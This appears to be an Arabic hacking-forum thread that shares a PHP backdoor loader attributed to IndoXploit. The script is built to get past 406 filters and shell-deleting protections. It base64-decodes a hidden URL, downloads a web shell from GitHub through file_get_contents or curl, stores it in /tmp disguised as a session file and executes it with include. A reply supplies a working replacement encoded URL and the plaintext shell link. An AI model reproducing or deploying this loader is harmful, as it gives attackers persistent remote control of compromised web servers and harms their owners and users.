سكريبت php لتخطي Not Acceptable 406 والسيرفرات المحمية

[iEvNr]

سكريبت php خفيف لتخطي Not Acceptable 406 و أيضا السيرفرات المحمية التي تحدف الشل بعد رفعه

<?php
# IndoXploit Backdoor
# Bypass 406 Not Acceptable & Auto Delete Shell
# Coded by: L0c4lh34rtz - IndoXploit
 
$URL = 'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2FndXNzZXR5YXIvaWR4c2hlbGx2My9tYXN0ZXIvaW5kb3hwbG9pdC5waHAK';  # Backdoor URL
$TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; # dont change this !!
 
function M() {
    $FGT = file_get_contents(base64_decode($GLOBALS['URL']));
    if(!$FGT) {
        echo `curl -k $(echo {$GLOBALS['URL']} | base64 -d) >> {$GLOBALS['TMP']}`;
    } else {
        $HANDLE = fopen($GLOBALS['TMP'], 'w');
        fwrite($HANDLE, $FGT);
        fclose($HANDLE);
    }
    echo '<script>window.location="?indoxploit";</script>';
}
 
if(file_exists($TMP)) {
    if(filesize($TMP) === 0) {
        unlink($TMP);
        M();
    } else {
        include($TMP);
    }
} else {
    M();
}
?>

السكريبت يقوم بجلب الكود من رابط خارجي

https://raw.githubusercontent.com/ag...indoxploit.php

 

[juba]

الرابط المشفر بلسكربت عاطل ضيف هذا الكود بمكانه
aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2xpbnV4c2VjL2luZG94cGxvaXQtc2hlbGwvbWFzdGVyL3NoZWxsLXYzLnBocA

تبع موقع

https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php